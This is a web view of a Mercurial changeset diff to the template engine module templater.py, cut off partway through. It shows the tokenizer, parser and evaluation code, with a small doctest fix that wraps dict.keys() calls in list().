##// END OF EJS Templates
doctest: coerce dict.keys() to list...
Yuya Nishihara -
r34141:be00af4a default
parent child Browse files
Show More
@@ -1,1460 +1,1460 b''
1 # templater.py - template expansion for output
1 # templater.py - template expansion for output
2 #
2 #
3 # Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
3 # Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import, print_function
8 from __future__ import absolute_import, print_function
9
9
10 import os
10 import os
11 import re
11 import re
12 import types
12 import types
13
13
14 from .i18n import _
14 from .i18n import _
15 from . import (
15 from . import (
16 color,
16 color,
17 config,
17 config,
18 encoding,
18 encoding,
19 error,
19 error,
20 minirst,
20 minirst,
21 obsutil,
21 obsutil,
22 parser,
22 parser,
23 pycompat,
23 pycompat,
24 registrar,
24 registrar,
25 revset as revsetmod,
25 revset as revsetmod,
26 revsetlang,
26 revsetlang,
27 templatefilters,
27 templatefilters,
28 templatekw,
28 templatekw,
29 util,
29 util,
30 )
30 )
31
31
32 # template parsing
32 # template parsing
33
33
34 elements = {
34 elements = {
35 # token-type: binding-strength, primary, prefix, infix, suffix
35 # token-type: binding-strength, primary, prefix, infix, suffix
36 "(": (20, None, ("group", 1, ")"), ("func", 1, ")"), None),
36 "(": (20, None, ("group", 1, ")"), ("func", 1, ")"), None),
37 "%": (16, None, None, ("%", 16), None),
37 "%": (16, None, None, ("%", 16), None),
38 "|": (15, None, None, ("|", 15), None),
38 "|": (15, None, None, ("|", 15), None),
39 "*": (5, None, None, ("*", 5), None),
39 "*": (5, None, None, ("*", 5), None),
40 "/": (5, None, None, ("/", 5), None),
40 "/": (5, None, None, ("/", 5), None),
41 "+": (4, None, None, ("+", 4), None),
41 "+": (4, None, None, ("+", 4), None),
42 "-": (4, None, ("negate", 19), ("-", 4), None),
42 "-": (4, None, ("negate", 19), ("-", 4), None),
43 "=": (3, None, None, ("keyvalue", 3), None),
43 "=": (3, None, None, ("keyvalue", 3), None),
44 ",": (2, None, None, ("list", 2), None),
44 ",": (2, None, None, ("list", 2), None),
45 ")": (0, None, None, None, None),
45 ")": (0, None, None, None, None),
46 "integer": (0, "integer", None, None, None),
46 "integer": (0, "integer", None, None, None),
47 "symbol": (0, "symbol", None, None, None),
47 "symbol": (0, "symbol", None, None, None),
48 "string": (0, "string", None, None, None),
48 "string": (0, "string", None, None, None),
49 "template": (0, "template", None, None, None),
49 "template": (0, "template", None, None, None),
50 "end": (0, None, None, None, None),
50 "end": (0, None, None, None, None),
51 }
51 }
52
52
53 def tokenize(program, start, end, term=None):
53 def tokenize(program, start, end, term=None):
54 """Parse a template expression into a stream of tokens, which must end
54 """Parse a template expression into a stream of tokens, which must end
55 with term if specified"""
55 with term if specified"""
56 pos = start
56 pos = start
57 program = pycompat.bytestr(program)
57 program = pycompat.bytestr(program)
58 while pos < end:
58 while pos < end:
59 c = program[pos]
59 c = program[pos]
60 if c.isspace(): # skip inter-token whitespace
60 if c.isspace(): # skip inter-token whitespace
61 pass
61 pass
62 elif c in "(=,)%|+-*/": # handle simple operators
62 elif c in "(=,)%|+-*/": # handle simple operators
63 yield (c, None, pos)
63 yield (c, None, pos)
64 elif c in '"\'': # handle quoted templates
64 elif c in '"\'': # handle quoted templates
65 s = pos + 1
65 s = pos + 1
66 data, pos = _parsetemplate(program, s, end, c)
66 data, pos = _parsetemplate(program, s, end, c)
67 yield ('template', data, s)
67 yield ('template', data, s)
68 pos -= 1
68 pos -= 1
69 elif c == 'r' and program[pos:pos + 2] in ("r'", 'r"'):
69 elif c == 'r' and program[pos:pos + 2] in ("r'", 'r"'):
70 # handle quoted strings
70 # handle quoted strings
71 c = program[pos + 1]
71 c = program[pos + 1]
72 s = pos = pos + 2
72 s = pos = pos + 2
73 while pos < end: # find closing quote
73 while pos < end: # find closing quote
74 d = program[pos]
74 d = program[pos]
75 if d == '\\': # skip over escaped characters
75 if d == '\\': # skip over escaped characters
76 pos += 2
76 pos += 2
77 continue
77 continue
78 if d == c:
78 if d == c:
79 yield ('string', program[s:pos], s)
79 yield ('string', program[s:pos], s)
80 break
80 break
81 pos += 1
81 pos += 1
82 else:
82 else:
83 raise error.ParseError(_("unterminated string"), s)
83 raise error.ParseError(_("unterminated string"), s)
84 elif c.isdigit():
84 elif c.isdigit():
85 s = pos
85 s = pos
86 while pos < end:
86 while pos < end:
87 d = program[pos]
87 d = program[pos]
88 if not d.isdigit():
88 if not d.isdigit():
89 break
89 break
90 pos += 1
90 pos += 1
91 yield ('integer', program[s:pos], s)
91 yield ('integer', program[s:pos], s)
92 pos -= 1
92 pos -= 1
93 elif (c == '\\' and program[pos:pos + 2] in (r"\'", r'\"')
93 elif (c == '\\' and program[pos:pos + 2] in (r"\'", r'\"')
94 or c == 'r' and program[pos:pos + 3] in (r"r\'", r'r\"')):
94 or c == 'r' and program[pos:pos + 3] in (r"r\'", r'r\"')):
95 # handle escaped quoted strings for compatibility with 2.9.2-3.4,
95 # handle escaped quoted strings for compatibility with 2.9.2-3.4,
96 # where some of nested templates were preprocessed as strings and
96 # where some of nested templates were preprocessed as strings and
97 # then compiled. therefore, \"...\" was allowed. (issue4733)
97 # then compiled. therefore, \"...\" was allowed. (issue4733)
98 #
98 #
99 # processing flow of _evalifliteral() at 5ab28a2e9962:
99 # processing flow of _evalifliteral() at 5ab28a2e9962:
100 # outer template string -> stringify() -> compiletemplate()
100 # outer template string -> stringify() -> compiletemplate()
101 # ------------------------ ------------ ------------------
101 # ------------------------ ------------ ------------------
102 # {f("\\\\ {g(\"\\\"\")}"} \\ {g("\"")} [r'\\', {g("\"")}]
102 # {f("\\\\ {g(\"\\\"\")}"} \\ {g("\"")} [r'\\', {g("\"")}]
103 # ~~~~~~~~
103 # ~~~~~~~~
104 # escaped quoted string
104 # escaped quoted string
105 if c == 'r':
105 if c == 'r':
106 pos += 1
106 pos += 1
107 token = 'string'
107 token = 'string'
108 else:
108 else:
109 token = 'template'
109 token = 'template'
110 quote = program[pos:pos + 2]
110 quote = program[pos:pos + 2]
111 s = pos = pos + 2
111 s = pos = pos + 2
112 while pos < end: # find closing escaped quote
112 while pos < end: # find closing escaped quote
113 if program.startswith('\\\\\\', pos, end):
113 if program.startswith('\\\\\\', pos, end):
114 pos += 4 # skip over double escaped characters
114 pos += 4 # skip over double escaped characters
115 continue
115 continue
116 if program.startswith(quote, pos, end):
116 if program.startswith(quote, pos, end):
117 # interpret as if it were a part of an outer string
117 # interpret as if it were a part of an outer string
118 data = parser.unescapestr(program[s:pos])
118 data = parser.unescapestr(program[s:pos])
119 if token == 'template':
119 if token == 'template':
120 data = _parsetemplate(data, 0, len(data))[0]
120 data = _parsetemplate(data, 0, len(data))[0]
121 yield (token, data, s)
121 yield (token, data, s)
122 pos += 1
122 pos += 1
123 break
123 break
124 pos += 1
124 pos += 1
125 else:
125 else:
126 raise error.ParseError(_("unterminated string"), s)
126 raise error.ParseError(_("unterminated string"), s)
127 elif c.isalnum() or c in '_':
127 elif c.isalnum() or c in '_':
128 s = pos
128 s = pos
129 pos += 1
129 pos += 1
130 while pos < end: # find end of symbol
130 while pos < end: # find end of symbol
131 d = program[pos]
131 d = program[pos]
132 if not (d.isalnum() or d == "_"):
132 if not (d.isalnum() or d == "_"):
133 break
133 break
134 pos += 1
134 pos += 1
135 sym = program[s:pos]
135 sym = program[s:pos]
136 yield ('symbol', sym, s)
136 yield ('symbol', sym, s)
137 pos -= 1
137 pos -= 1
138 elif c == term:
138 elif c == term:
139 yield ('end', None, pos + 1)
139 yield ('end', None, pos + 1)
140 return
140 return
141 else:
141 else:
142 raise error.ParseError(_("syntax error"), pos)
142 raise error.ParseError(_("syntax error"), pos)
143 pos += 1
143 pos += 1
144 if term:
144 if term:
145 raise error.ParseError(_("unterminated template expansion"), start)
145 raise error.ParseError(_("unterminated template expansion"), start)
146 yield ('end', None, pos)
146 yield ('end', None, pos)
147
147
148 def _parsetemplate(tmpl, start, stop, quote=''):
148 def _parsetemplate(tmpl, start, stop, quote=''):
149 r"""
149 r"""
150 >>> _parsetemplate(b'foo{bar}"baz', 0, 12)
150 >>> _parsetemplate(b'foo{bar}"baz', 0, 12)
151 ([('string', 'foo'), ('symbol', 'bar'), ('string', '"baz')], 12)
151 ([('string', 'foo'), ('symbol', 'bar'), ('string', '"baz')], 12)
152 >>> _parsetemplate(b'foo{bar}"baz', 0, 12, quote=b'"')
152 >>> _parsetemplate(b'foo{bar}"baz', 0, 12, quote=b'"')
153 ([('string', 'foo'), ('symbol', 'bar')], 9)
153 ([('string', 'foo'), ('symbol', 'bar')], 9)
154 >>> _parsetemplate(b'foo"{bar}', 0, 9, quote=b'"')
154 >>> _parsetemplate(b'foo"{bar}', 0, 9, quote=b'"')
155 ([('string', 'foo')], 4)
155 ([('string', 'foo')], 4)
156 >>> _parsetemplate(br'foo\"bar"baz', 0, 12, quote=b'"')
156 >>> _parsetemplate(br'foo\"bar"baz', 0, 12, quote=b'"')
157 ([('string', 'foo"'), ('string', 'bar')], 9)
157 ([('string', 'foo"'), ('string', 'bar')], 9)
158 >>> _parsetemplate(br'foo\\"bar', 0, 10, quote=b'"')
158 >>> _parsetemplate(br'foo\\"bar', 0, 10, quote=b'"')
159 ([('string', 'foo\\')], 6)
159 ([('string', 'foo\\')], 6)
160 """
160 """
161 parsed = []
161 parsed = []
162 sepchars = '{' + quote
162 sepchars = '{' + quote
163 pos = start
163 pos = start
164 p = parser.parser(elements)
164 p = parser.parser(elements)
165 while pos < stop:
165 while pos < stop:
166 n = min((tmpl.find(c, pos, stop) for c in sepchars),
166 n = min((tmpl.find(c, pos, stop) for c in sepchars),
167 key=lambda n: (n < 0, n))
167 key=lambda n: (n < 0, n))
168 if n < 0:
168 if n < 0:
169 parsed.append(('string', parser.unescapestr(tmpl[pos:stop])))
169 parsed.append(('string', parser.unescapestr(tmpl[pos:stop])))
170 pos = stop
170 pos = stop
171 break
171 break
172 c = tmpl[n:n + 1]
172 c = tmpl[n:n + 1]
173 bs = (n - pos) - len(tmpl[pos:n].rstrip('\\'))
173 bs = (n - pos) - len(tmpl[pos:n].rstrip('\\'))
174 if bs % 2 == 1:
174 if bs % 2 == 1:
175 # escaped (e.g. '\{', '\\\{', but not '\\{')
175 # escaped (e.g. '\{', '\\\{', but not '\\{')
176 parsed.append(('string', parser.unescapestr(tmpl[pos:n - 1]) + c))
176 parsed.append(('string', parser.unescapestr(tmpl[pos:n - 1]) + c))
177 pos = n + 1
177 pos = n + 1
178 continue
178 continue
179 if n > pos:
179 if n > pos:
180 parsed.append(('string', parser.unescapestr(tmpl[pos:n])))
180 parsed.append(('string', parser.unescapestr(tmpl[pos:n])))
181 if c == quote:
181 if c == quote:
182 return parsed, n + 1
182 return parsed, n + 1
183
183
184 parseres, pos = p.parse(tokenize(tmpl, n + 1, stop, '}'))
184 parseres, pos = p.parse(tokenize(tmpl, n + 1, stop, '}'))
185 parsed.append(parseres)
185 parsed.append(parseres)
186
186
187 if quote:
187 if quote:
188 raise error.ParseError(_("unterminated string"), start)
188 raise error.ParseError(_("unterminated string"), start)
189 return parsed, pos
189 return parsed, pos
190
190
191 def _unnesttemplatelist(tree):
191 def _unnesttemplatelist(tree):
192 """Expand list of templates to node tuple
192 """Expand list of templates to node tuple
193
193
194 >>> def f(tree):
194 >>> def f(tree):
195 ... print(pycompat.sysstr(prettyformat(_unnesttemplatelist(tree))))
195 ... print(pycompat.sysstr(prettyformat(_unnesttemplatelist(tree))))
196 >>> f((b'template', []))
196 >>> f((b'template', []))
197 (string '')
197 (string '')
198 >>> f((b'template', [(b'string', b'foo')]))
198 >>> f((b'template', [(b'string', b'foo')]))
199 (string 'foo')
199 (string 'foo')
200 >>> f((b'template', [(b'string', b'foo'), (b'symbol', b'rev')]))
200 >>> f((b'template', [(b'string', b'foo'), (b'symbol', b'rev')]))
201 (template
201 (template
202 (string 'foo')
202 (string 'foo')
203 (symbol 'rev'))
203 (symbol 'rev'))
204 >>> f((b'template', [(b'symbol', b'rev')])) # template(rev) -> str
204 >>> f((b'template', [(b'symbol', b'rev')])) # template(rev) -> str
205 (template
205 (template
206 (symbol 'rev'))
206 (symbol 'rev'))
207 >>> f((b'template', [(b'template', [(b'string', b'foo')])]))
207 >>> f((b'template', [(b'template', [(b'string', b'foo')])]))
208 (string 'foo')
208 (string 'foo')
209 """
209 """
210 if not isinstance(tree, tuple):
210 if not isinstance(tree, tuple):
211 return tree
211 return tree
212 op = tree[0]
212 op = tree[0]
213 if op != 'template':
213 if op != 'template':
214 return (op,) + tuple(_unnesttemplatelist(x) for x in tree[1:])
214 return (op,) + tuple(_unnesttemplatelist(x) for x in tree[1:])
215
215
216 assert len(tree) == 2
216 assert len(tree) == 2
217 xs = tuple(_unnesttemplatelist(x) for x in tree[1])
217 xs = tuple(_unnesttemplatelist(x) for x in tree[1])
218 if not xs:
218 if not xs:
219 return ('string', '') # empty template ""
219 return ('string', '') # empty template ""
220 elif len(xs) == 1 and xs[0][0] == 'string':
220 elif len(xs) == 1 and xs[0][0] == 'string':
221 return xs[0] # fast path for string with no template fragment "x"
221 return xs[0] # fast path for string with no template fragment "x"
222 else:
222 else:
223 return (op,) + xs
223 return (op,) + xs
224
224
225 def parse(tmpl):
225 def parse(tmpl):
226 """Parse template string into tree"""
226 """Parse template string into tree"""
227 parsed, pos = _parsetemplate(tmpl, 0, len(tmpl))
227 parsed, pos = _parsetemplate(tmpl, 0, len(tmpl))
228 assert pos == len(tmpl), 'unquoted template should be consumed'
228 assert pos == len(tmpl), 'unquoted template should be consumed'
229 return _unnesttemplatelist(('template', parsed))
229 return _unnesttemplatelist(('template', parsed))
230
230
231 def _parseexpr(expr):
231 def _parseexpr(expr):
232 """Parse a template expression into tree
232 """Parse a template expression into tree
233
233
234 >>> _parseexpr(b'"foo"')
234 >>> _parseexpr(b'"foo"')
235 ('string', 'foo')
235 ('string', 'foo')
236 >>> _parseexpr(b'foo(bar)')
236 >>> _parseexpr(b'foo(bar)')
237 ('func', ('symbol', 'foo'), ('symbol', 'bar'))
237 ('func', ('symbol', 'foo'), ('symbol', 'bar'))
238 >>> _parseexpr(b'foo(')
238 >>> _parseexpr(b'foo(')
239 Traceback (most recent call last):
239 Traceback (most recent call last):
240 ...
240 ...
241 ParseError: ('not a prefix: end', 4)
241 ParseError: ('not a prefix: end', 4)
242 >>> _parseexpr(b'"foo" "bar"')
242 >>> _parseexpr(b'"foo" "bar"')
243 Traceback (most recent call last):
243 Traceback (most recent call last):
244 ...
244 ...
245 ParseError: ('invalid token', 7)
245 ParseError: ('invalid token', 7)
246 """
246 """
247 p = parser.parser(elements)
247 p = parser.parser(elements)
248 tree, pos = p.parse(tokenize(expr, 0, len(expr)))
248 tree, pos = p.parse(tokenize(expr, 0, len(expr)))
249 if pos != len(expr):
249 if pos != len(expr):
250 raise error.ParseError(_('invalid token'), pos)
250 raise error.ParseError(_('invalid token'), pos)
251 return _unnesttemplatelist(tree)
251 return _unnesttemplatelist(tree)
252
252
253 def prettyformat(tree):
253 def prettyformat(tree):
254 return parser.prettyformat(tree, ('integer', 'string', 'symbol'))
254 return parser.prettyformat(tree, ('integer', 'string', 'symbol'))
255
255
256 def compileexp(exp, context, curmethods):
256 def compileexp(exp, context, curmethods):
257 """Compile parsed template tree to (func, data) pair"""
257 """Compile parsed template tree to (func, data) pair"""
258 t = exp[0]
258 t = exp[0]
259 if t in curmethods:
259 if t in curmethods:
260 return curmethods[t](exp, context)
260 return curmethods[t](exp, context)
261 raise error.ParseError(_("unknown method '%s'") % t)
261 raise error.ParseError(_("unknown method '%s'") % t)
262
262
263 # template evaluation
263 # template evaluation
264
264
265 def getsymbol(exp):
265 def getsymbol(exp):
266 if exp[0] == 'symbol':
266 if exp[0] == 'symbol':
267 return exp[1]
267 return exp[1]
268 raise error.ParseError(_("expected a symbol, got '%s'") % exp[0])
268 raise error.ParseError(_("expected a symbol, got '%s'") % exp[0])
269
269
270 def getlist(x):
270 def getlist(x):
271 if not x:
271 if not x:
272 return []
272 return []
273 if x[0] == 'list':
273 if x[0] == 'list':
274 return getlist(x[1]) + [x[2]]
274 return getlist(x[1]) + [x[2]]
275 return [x]
275 return [x]
276
276
277 def gettemplate(exp, context):
277 def gettemplate(exp, context):
278 """Compile given template tree or load named template from map file;
278 """Compile given template tree or load named template from map file;
279 returns (func, data) pair"""
279 returns (func, data) pair"""
280 if exp[0] in ('template', 'string'):
280 if exp[0] in ('template', 'string'):
281 return compileexp(exp, context, methods)
281 return compileexp(exp, context, methods)
282 if exp[0] == 'symbol':
282 if exp[0] == 'symbol':
283 # unlike runsymbol(), here 'symbol' is always taken as template name
283 # unlike runsymbol(), here 'symbol' is always taken as template name
284 # even if it exists in mapping. this allows us to override mapping
284 # even if it exists in mapping. this allows us to override mapping
285 # by web templates, e.g. 'changelogtag' is redefined in map file.
285 # by web templates, e.g. 'changelogtag' is redefined in map file.
286 return context._load(exp[1])
286 return context._load(exp[1])
287 raise error.ParseError(_("expected template specifier"))
287 raise error.ParseError(_("expected template specifier"))
288
288
289 def findsymbolicname(arg):
289 def findsymbolicname(arg):
290 """Find symbolic name for the given compiled expression; returns None
290 """Find symbolic name for the given compiled expression; returns None
291 if nothing found reliably"""
291 if nothing found reliably"""
292 while True:
292 while True:
293 func, data = arg
293 func, data = arg
294 if func is runsymbol:
294 if func is runsymbol:
295 return data
295 return data
296 elif func is runfilter:
296 elif func is runfilter:
297 arg = data[0]
297 arg = data[0]
298 else:
298 else:
299 return None
299 return None
300
300
301 def evalfuncarg(context, mapping, arg):
301 def evalfuncarg(context, mapping, arg):
302 func, data = arg
302 func, data = arg
303 # func() may return string, generator of strings or arbitrary object such
303 # func() may return string, generator of strings or arbitrary object such
304 # as date tuple, but filter does not want generator.
304 # as date tuple, but filter does not want generator.
305 thing = func(context, mapping, data)
305 thing = func(context, mapping, data)
306 if isinstance(thing, types.GeneratorType):
306 if isinstance(thing, types.GeneratorType):
307 thing = stringify(thing)
307 thing = stringify(thing)
308 return thing
308 return thing
309
309
310 def evalboolean(context, mapping, arg):
310 def evalboolean(context, mapping, arg):
311 """Evaluate given argument as boolean, but also takes boolean literals"""
311 """Evaluate given argument as boolean, but also takes boolean literals"""
312 func, data = arg
312 func, data = arg
313 if func is runsymbol:
313 if func is runsymbol:
314 thing = func(context, mapping, data, default=None)
314 thing = func(context, mapping, data, default=None)
315 if thing is None:
315 if thing is None:
316 # not a template keyword, takes as a boolean literal
316 # not a template keyword, takes as a boolean literal
317 thing = util.parsebool(data)
317 thing = util.parsebool(data)
318 else:
318 else:
319 thing = func(context, mapping, data)
319 thing = func(context, mapping, data)
320 if isinstance(thing, bool):
320 if isinstance(thing, bool):
321 return thing
321 return thing
322 # other objects are evaluated as strings, which means 0 is True, but
322 # other objects are evaluated as strings, which means 0 is True, but
323 # empty dict/list should be False as they are expected to be ''
323 # empty dict/list should be False as they are expected to be ''
324 return bool(stringify(thing))
324 return bool(stringify(thing))
325
325
326 def evalinteger(context, mapping, arg, err):
326 def evalinteger(context, mapping, arg, err):
327 v = evalfuncarg(context, mapping, arg)
327 v = evalfuncarg(context, mapping, arg)
328 try:
328 try:
329 return int(v)
329 return int(v)
330 except (TypeError, ValueError):
330 except (TypeError, ValueError):
331 raise error.ParseError(err)
331 raise error.ParseError(err)
332
332
333 def evalstring(context, mapping, arg):
333 def evalstring(context, mapping, arg):
334 func, data = arg
334 func, data = arg
335 return stringify(func(context, mapping, data))
335 return stringify(func(context, mapping, data))
336
336
337 def evalstringliteral(context, mapping, arg):
337 def evalstringliteral(context, mapping, arg):
338 """Evaluate given argument as string template, but returns symbol name
338 """Evaluate given argument as string template, but returns symbol name
339 if it is unknown"""
339 if it is unknown"""
340 func, data = arg
340 func, data = arg
341 if func is runsymbol:
341 if func is runsymbol:
342 thing = func(context, mapping, data, default=data)
342 thing = func(context, mapping, data, default=data)
343 else:
343 else:
344 thing = func(context, mapping, data)
344 thing = func(context, mapping, data)
345 return stringify(thing)
345 return stringify(thing)
346
346
347 def runinteger(context, mapping, data):
347 def runinteger(context, mapping, data):
348 return int(data)
348 return int(data)
349
349
350 def runstring(context, mapping, data):
350 def runstring(context, mapping, data):
351 return data
351 return data
352
352
353 def _recursivesymbolblocker(key):
353 def _recursivesymbolblocker(key):
354 def showrecursion(**args):
354 def showrecursion(**args):
355 raise error.Abort(_("recursive reference '%s' in template") % key)
355 raise error.Abort(_("recursive reference '%s' in template") % key)
356 return showrecursion
356 return showrecursion
357
357
358 def _runrecursivesymbol(context, mapping, key):
358 def _runrecursivesymbol(context, mapping, key):
359 raise error.Abort(_("recursive reference '%s' in template") % key)
359 raise error.Abort(_("recursive reference '%s' in template") % key)
360
360
361 def runsymbol(context, mapping, key, default=''):
361 def runsymbol(context, mapping, key, default=''):
362 v = mapping.get(key)
362 v = mapping.get(key)
363 if v is None:
363 if v is None:
364 v = context._defaults.get(key)
364 v = context._defaults.get(key)
365 if v is None:
365 if v is None:
366 # put poison to cut recursion. we can't move this to parsing phase
366 # put poison to cut recursion. we can't move this to parsing phase
367 # because "x = {x}" is allowed if "x" is a keyword. (issue4758)
367 # because "x = {x}" is allowed if "x" is a keyword. (issue4758)
368 safemapping = mapping.copy()
368 safemapping = mapping.copy()
369 safemapping[key] = _recursivesymbolblocker(key)
369 safemapping[key] = _recursivesymbolblocker(key)
370 try:
370 try:
371 v = context.process(key, safemapping)
371 v = context.process(key, safemapping)
372 except TemplateNotFound:
372 except TemplateNotFound:
373 v = default
373 v = default
374 if callable(v):
374 if callable(v):
375 return v(**pycompat.strkwargs(mapping))
375 return v(**pycompat.strkwargs(mapping))
376 return v
376 return v
377
377
378 def buildtemplate(exp, context):
378 def buildtemplate(exp, context):
379 ctmpl = [compileexp(e, context, methods) for e in exp[1:]]
379 ctmpl = [compileexp(e, context, methods) for e in exp[1:]]
380 return (runtemplate, ctmpl)
380 return (runtemplate, ctmpl)
381
381
382 def runtemplate(context, mapping, template):
382 def runtemplate(context, mapping, template):
383 for func, data in template:
383 for func, data in template:
384 yield func(context, mapping, data)
384 yield func(context, mapping, data)
385
385
386 def buildfilter(exp, context):
386 def buildfilter(exp, context):
387 n = getsymbol(exp[2])
387 n = getsymbol(exp[2])
388 if n in context._filters:
388 if n in context._filters:
389 filt = context._filters[n]
389 filt = context._filters[n]
390 arg = compileexp(exp[1], context, methods)
390 arg = compileexp(exp[1], context, methods)
391 return (runfilter, (arg, filt))
391 return (runfilter, (arg, filt))
392 if n in funcs:
392 if n in funcs:
393 f = funcs[n]
393 f = funcs[n]
394 args = _buildfuncargs(exp[1], context, methods, n, f._argspec)
394 args = _buildfuncargs(exp[1], context, methods, n, f._argspec)
395 return (f, args)
395 return (f, args)
396 raise error.ParseError(_("unknown function '%s'") % n)
396 raise error.ParseError(_("unknown function '%s'") % n)
397
397
398 def runfilter(context, mapping, data):
398 def runfilter(context, mapping, data):
399 arg, filt = data
399 arg, filt = data
400 thing = evalfuncarg(context, mapping, arg)
400 thing = evalfuncarg(context, mapping, arg)
401 try:
401 try:
402 return filt(thing)
402 return filt(thing)
403 except (ValueError, AttributeError, TypeError):
403 except (ValueError, AttributeError, TypeError):
404 sym = findsymbolicname(arg)
404 sym = findsymbolicname(arg)
405 if sym:
405 if sym:
406 msg = (_("template filter '%s' is not compatible with keyword '%s'")
406 msg = (_("template filter '%s' is not compatible with keyword '%s'")
407 % (filt.func_name, sym))
407 % (filt.func_name, sym))
408 else:
408 else:
409 msg = _("incompatible use of template filter '%s'") % filt.func_name
409 msg = _("incompatible use of template filter '%s'") % filt.func_name
410 raise error.Abort(msg)
410 raise error.Abort(msg)
411
411
412 def buildmap(exp, context):
412 def buildmap(exp, context):
413 func, data = compileexp(exp[1], context, methods)
413 func, data = compileexp(exp[1], context, methods)
414 tfunc, tdata = gettemplate(exp[2], context)
414 tfunc, tdata = gettemplate(exp[2], context)
415 return (runmap, (func, data, tfunc, tdata))
415 return (runmap, (func, data, tfunc, tdata))
416
416
417 def runmap(context, mapping, data):
417 def runmap(context, mapping, data):
418 func, data, tfunc, tdata = data
418 func, data, tfunc, tdata = data
419 d = func(context, mapping, data)
419 d = func(context, mapping, data)
420 if util.safehasattr(d, 'itermaps'):
420 if util.safehasattr(d, 'itermaps'):
421 diter = d.itermaps()
421 diter = d.itermaps()
422 else:
422 else:
423 try:
423 try:
424 diter = iter(d)
424 diter = iter(d)
425 except TypeError:
425 except TypeError:
426 if func is runsymbol:
426 if func is runsymbol:
427 raise error.ParseError(_("keyword '%s' is not iterable") % data)
427 raise error.ParseError(_("keyword '%s' is not iterable") % data)
428 else:
428 else:
429 raise error.ParseError(_("%r is not iterable") % d)
429 raise error.ParseError(_("%r is not iterable") % d)
430
430
431 for i, v in enumerate(diter):
431 for i, v in enumerate(diter):
432 lm = mapping.copy()
432 lm = mapping.copy()
433 lm['index'] = i
433 lm['index'] = i
434 if isinstance(v, dict):
434 if isinstance(v, dict):
435 lm.update(v)
435 lm.update(v)
436 lm['originalnode'] = mapping.get('node')
436 lm['originalnode'] = mapping.get('node')
437 yield tfunc(context, lm, tdata)
437 yield tfunc(context, lm, tdata)
438 else:
438 else:
439 # v is not an iterable of dicts, this happen when 'key'
439 # v is not an iterable of dicts, this happen when 'key'
440 # has been fully expanded already and format is useless.
440 # has been fully expanded already and format is useless.
441 # If so, return the expanded value.
441 # If so, return the expanded value.
442 yield v
442 yield v
443
443
444 def buildnegate(exp, context):
444 def buildnegate(exp, context):
445 arg = compileexp(exp[1], context, exprmethods)
445 arg = compileexp(exp[1], context, exprmethods)
446 return (runnegate, arg)
446 return (runnegate, arg)
447
447
448 def runnegate(context, mapping, data):
448 def runnegate(context, mapping, data):
449 data = evalinteger(context, mapping, data,
449 data = evalinteger(context, mapping, data,
450 _('negation needs an integer argument'))
450 _('negation needs an integer argument'))
451 return -data
451 return -data
452
452
453 def buildarithmetic(exp, context, func):
453 def buildarithmetic(exp, context, func):
454 left = compileexp(exp[1], context, exprmethods)
454 left = compileexp(exp[1], context, exprmethods)
455 right = compileexp(exp[2], context, exprmethods)
455 right = compileexp(exp[2], context, exprmethods)
456 return (runarithmetic, (func, left, right))
456 return (runarithmetic, (func, left, right))
457
457
458 def runarithmetic(context, mapping, data):
458 def runarithmetic(context, mapping, data):
459 func, left, right = data
459 func, left, right = data
460 left = evalinteger(context, mapping, left,
460 left = evalinteger(context, mapping, left,
461 _('arithmetic only defined on integers'))
461 _('arithmetic only defined on integers'))
462 right = evalinteger(context, mapping, right,
462 right = evalinteger(context, mapping, right,
463 _('arithmetic only defined on integers'))
463 _('arithmetic only defined on integers'))
464 try:
464 try:
465 return func(left, right)
465 return func(left, right)
466 except ZeroDivisionError:
466 except ZeroDivisionError:
467 raise error.Abort(_('division by zero is not defined'))
467 raise error.Abort(_('division by zero is not defined'))
468
468
469 def buildfunc(exp, context):
469 def buildfunc(exp, context):
470 n = getsymbol(exp[1])
470 n = getsymbol(exp[1])
471 if n in funcs:
471 if n in funcs:
472 f = funcs[n]
472 f = funcs[n]
473 args = _buildfuncargs(exp[2], context, exprmethods, n, f._argspec)
473 args = _buildfuncargs(exp[2], context, exprmethods, n, f._argspec)
474 return (f, args)
474 return (f, args)
475 if n in context._filters:
475 if n in context._filters:
476 args = _buildfuncargs(exp[2], context, exprmethods, n, argspec=None)
476 args = _buildfuncargs(exp[2], context, exprmethods, n, argspec=None)
477 if len(args) != 1:
477 if len(args) != 1:
478 raise error.ParseError(_("filter %s expects one argument") % n)
478 raise error.ParseError(_("filter %s expects one argument") % n)
479 f = context._filters[n]
479 f = context._filters[n]
480 return (runfilter, (args[0], f))
480 return (runfilter, (args[0], f))
481 raise error.ParseError(_("unknown function '%s'") % n)
481 raise error.ParseError(_("unknown function '%s'") % n)
482
482
483 def _buildfuncargs(exp, context, curmethods, funcname, argspec):
483 def _buildfuncargs(exp, context, curmethods, funcname, argspec):
484 """Compile parsed tree of function arguments into list or dict of
484 """Compile parsed tree of function arguments into list or dict of
485 (func, data) pairs
485 (func, data) pairs
486
486
487 >>> context = engine(lambda t: (runsymbol, t))
487 >>> context = engine(lambda t: (runsymbol, t))
488 >>> def fargs(expr, argspec):
488 >>> def fargs(expr, argspec):
489 ... x = _parseexpr(expr)
489 ... x = _parseexpr(expr)
490 ... n = getsymbol(x[1])
490 ... n = getsymbol(x[1])
491 ... return _buildfuncargs(x[2], context, exprmethods, n, argspec)
491 ... return _buildfuncargs(x[2], context, exprmethods, n, argspec)
492 >>> fargs(b'a(l=1, k=2)', b'k l m').keys()
492 >>> list(fargs(b'a(l=1, k=2)', b'k l m').keys())
493 ['l', 'k']
493 ['l', 'k']
494 >>> args = fargs(b'a(opts=1, k=2)', b'**opts')
494 >>> args = fargs(b'a(opts=1, k=2)', b'**opts')
495 >>> args.keys(), args[b'opts'].keys()
495 >>> list(args.keys()), list(args[b'opts'].keys())
496 (['opts'], ['opts', 'k'])
496 (['opts'], ['opts', 'k'])
497 """
497 """
498 def compiledict(xs):
498 def compiledict(xs):
499 return util.sortdict((k, compileexp(x, context, curmethods))
499 return util.sortdict((k, compileexp(x, context, curmethods))
500 for k, x in xs.iteritems())
500 for k, x in xs.iteritems())
501 def compilelist(xs):
501 def compilelist(xs):
502 return [compileexp(x, context, curmethods) for x in xs]
502 return [compileexp(x, context, curmethods) for x in xs]
503
503
504 if not argspec:
504 if not argspec:
505 # filter or function with no argspec: return list of positional args
505 # filter or function with no argspec: return list of positional args
506 return compilelist(getlist(exp))
506 return compilelist(getlist(exp))
507
507
508 # function with argspec: return dict of named args
